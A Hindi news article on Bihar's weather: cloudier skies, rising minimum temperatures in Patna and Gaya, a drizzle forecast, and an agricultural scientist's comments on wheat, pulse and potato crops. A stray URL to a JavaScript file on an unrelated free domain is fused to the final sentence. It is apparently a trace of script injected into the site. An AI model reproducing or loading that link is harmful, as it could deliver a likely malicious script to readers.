बिहार में  मौसम विभाग ने अगले 24 घंटे के संबंध में जाने क्या बताया।

 

 

 

 

बिहार,( कुलसूम फात्मा ) वैसे तो हर रोज बिहार राज्य में भीनी भीनी धूप निकली रहती थी और शाम के समय अधा धुम कोहरा छा जाता था, परंतु आज के दिन कुछ नया ही मौसम ने मोड़ लिया। जहां हर रोज धूप भीनी भीनी निकली रहती थी वहीं सोमवार के दिन धूप ने लुका छुपी खेली ।

 

 

जी हां, बिहार में सोमवार के दिन मौसम ने मोड़ लिया   हर रोज की तरह सर्द हवा तो चली परंतु सुबह के समय धूप नहीं निकली। पिछले चौबीस घंटों में बिहार के ज्यादातर डिस्ट्रिक्ट में बादल छाने से न्यूनतम टेंपरेचर में तेजी के साथ बढ़ोतरी हुई। वहीं दूसरी ओर दिन का तापमान भी गिरा रहा। मौसम विभाग ने बताया की उत्तरी भाग में बूंदाबांदी भी हो सकती है।

 

 

जाने पटना के न्यूनतम पारे के बारे में।

 

 

यदि हम पटना के न्यूनतम टेंपरेचर की बात करें तो पिछले तकरीबन 24 घंटे के अंतर्गत यहां 3 डिग्री बढ़ोतरी हुई। मौसम विभाग केंद्र ने कहा की अगले आनेवाले 24 घंटे के भीतर मौसम में खास तब्दीली नजर नहीं आएगी। सोमवार के दिन यह बादल छाए रहेंगे। धूप निकलने के आसार कम हैं। बिहार में सबसे ठंडा गया का टेंपरेचर रहा। यहां का टेंपरेचर तकरीबन 2 डिग्री ऊपर चढ़कर के 7.5 डिग्री सेल्सियस रिकॉर्ड किया गया।

 

मौसम में तब्दीली से कृषि वैज्ञानिकों का जाने क्या है कहना  ?

 

 

बिहार राज्य के सीनियर कृषि वैज्ञानिक जिनका नाम अनिल कुमार झा है उनसे जब बातचीत हुई तो उन्होंने कहा की वर्तमान समय में खेती में जो भी फसलें हैं उनके लिए रात तथा दिन में कम टेंपरेचर ही योग्य होगा  और कुछ स्थानों पर बूंदाबांदी भी होने के आसार हैं तो इससे गेहूं तथा दलहनी फसलों को लाभ पहुंचेगा। वहीं दूसरी ओर गेहूं की खेती में सिंचाई का व्यय भी बच जाएगा परंतु यह बारिश अधिक नहीं होनी चाहिए। बूंदाबांदी के ही रूप में होनी चाहिए। दूसरी तरफ उन्होंने यह भी बताया की ज्यादा कोहरा तथा बादल छाने की दशा में आलू की फसलों में रोग लगने के आसार अधिक बढ़ सकते हैं।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.